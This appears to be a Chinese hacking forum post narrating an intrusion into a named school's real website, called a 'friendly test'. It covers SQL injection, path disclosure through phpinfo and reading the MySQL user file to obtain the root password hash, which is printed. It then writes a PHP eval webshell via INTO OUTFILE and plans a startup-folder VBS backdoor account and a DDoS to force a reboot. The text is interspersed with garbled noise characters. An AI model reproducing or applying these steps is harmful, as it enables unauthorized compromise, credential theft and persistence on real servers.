友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
& v: a* Z2 A! E发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
# A: N2 _7 T1 s2 d4 M


8 I0 a( l  s5 ]1 _' Y2 }常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
' d/ U6 U0 L+ C- H5 }
8 h7 a4 K+ ^2 f3 {+ H$ x; l2 v那么想可以直接写入shell ，getshell有几个条件：
3 J4 @- l% u2 S5 x" ], K* L

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
3./load_file()  
8 i: L' B* g; `( C# C4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
8 P- r) p9 c' S$ u0 N+ j5./phpmyadmin/libraries/select_lang.lib.php  
# ?( p2 Y" H2 W/ c) p0 H& P6./phpmyadmin/libraries/lect_lang.lib.php  
8 u; g( P. ]- x! y7./phpmyadmin/libraries/mcrypt.lib.php   
/ i3 _/ U/ O7 Q# M3 C* `+ b2 |& x% x8./phpmyadmin/libraries/export/xls.php  
" p( ]2 w! H& L$ [1 A2 T
, Q) ^- {- J9 l* G8 o4 V9 f均不行...........................
  \* F% H; Q; Y& d$ K8 f( ^
/ ^4 R$ \0 A" z* _5 S# \6 O( r0 ^' s御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
/ F' j, v% B6 b9 O' p2 i
( g2 _0 v, K; x6 T4 m权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
  U+ a8 w6 j" V$ h4 Z' U* d
/ u- {% X, ?% ~9 z% e* E默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
* g  F# ?$ _9 S
3 m* _9 z, w6 N& V: @+ w6 x4 F- ]自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

; D, l. W0 u5 J6 r成功读到root密码：
# K% J, A# s, y# g# s  `
" y% u0 K3 H4 e; V( A17---- r(0072)
; Y& j+ F1 F" j1 h. I# W& [8 m18---- o(006f)
19---- o(006f)
; a% R9 L8 H  B1 f" O/ A20---- t(0074)
21---- *(002a)
22---- 8(0038)
, `' Q9 O: g7 T23---- 2(0032)
" g) f1 ]8 z( F7 E7 @24---- E(0045)
25---- 1(0031)
26---- C(0043)
27---- 5(0035)
( Y2 n5 \* i. ?- z28---- 8(0038)
6 U0 p; @# P0 ?5 k, k6 n3 t29---- 2(0032)
* }8 [2 O4 Z3 D2 f: A0 a: k2 o30---- 8(0038)
2 O  i/ J' b# T% h( E: Y6 J' I1 B31---- A(0041)
8 R+ c4 q' i  K" K' ]$ ~, m32---- 9(0039)
33---- B(0042)
! A, T; U: W/ k; ?34---- 5(0035)
35---- 4(0034)
) N/ @' ~& a3 ^- c7 n$ \36---- 8(0038)
37---- 6(0036)
38---- 4(0034)
: R8 i8 x" p  w: K39---- 9(0039)
& i3 ]. T$ ]9 D; v6 E+ Y40---- 1(0031)
41---- 1(0031)
' q- R  w/ L$ a: e- p3 f3 q5 r42---- 5(0035)
43---- 3(0033)
44---- 5(0035)
45---- 9(0039)
! R( E% l2 d# U  ?46---- 8(0038)
8 W+ L) K9 f2 p/ o8 A9 z- S, S47---- F(0046)
- x$ M# |  n& C! c2 U48---- F(0046)
  F7 M* W! }7 x1 q' u: A49---- 4(0034)
& j9 C) P4 B+ O. Y) _; s" x  r* j6 D50---- F(0046)
9 A* @0 b6 K- ]51---- 0(0030)
! I- z+ r& H# K: a2 K52---- 3(0033)
53---- 2(0032)
54---- A(0041)
& _' z, |! H' t6 @6 c: ?5 u55---- 4(0034)
8 a% b$ d  O" a$ U/ M% v56---- A(0041)
57---- B(0042)
58---- *(0044)
59---- *(0035)
60---- *(0041)
61---- *0032)

解密后成功登陆phpmyamin
                          

9 u- X" n9 p- O1 T                             
  d5 F9 b0 q" w# d3 t% D
1 `( I0 x8 B4 u: U8 W# k1 E找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

; ^  C9 L3 t: b5 l成功执行，拿下shell，菜刀连接：

服务器不支持asp,aspx,php提权无果...................
7 m- S) k1 g3 G. V
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
  Q' S7 r' N" j" I1 Q

服务器上已经有个隐藏帐号了

别名     administrators
- s9 C6 L% O" f1 Q注释     管理员对计算机/域有不受限制的完全访问权

成员

3 l' J( ?4 \9 K# E8 i( S# o. n

-------------------------------------------------------------------------------
admin
# v/ [( h- q7 L2 bAdministrator
- E6 ^1 s; G$ A* J' P0 _' d; [. [slipper$
sqluser
% y  S* c) t2 t4 H2 p命令成功完成。
* S! f; O# K4 Q
' o% A; n6 Q5 N7 y! W0 C" d服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

ddos服务器重启，不然就只能坐等服务器重启了...............................
: E" Q3 j. Z0 G6 c
' ?9 z8 @/ i4 q2 J1 p( R      

; S/ T" S& H) ?6 l" w# w" J' N

angel